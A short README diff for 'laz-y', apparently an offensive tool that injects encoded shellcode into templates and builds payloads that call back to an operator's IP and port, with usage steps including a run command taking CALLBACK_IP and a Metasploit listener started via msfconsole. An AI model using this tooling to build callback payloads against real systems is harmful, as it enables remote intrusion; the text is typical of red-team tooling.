Nariod/laz-y/README.md

 * Add the mark `!!!_SHELLCODE_MARK!!!` in the templates, where you want the shellcode to be injected
 * Add the mark `!!!DECODE_ROUTINE!!!` in the templates, where you want the decoding routine to be injected
 * Run the script with `python3 laz-y.py -l CALLBACK_IP -p CALLBACK_PORT -e ENCODING_OPTION`
-* Edit and import the .rc file in msfconsole
+* Edit the appropriate .rc file with your IP/domain
+* Start your listener with `sudo msfconsole -q -r https.rc`

 ![Usage](/images/Usage-screenshot.png)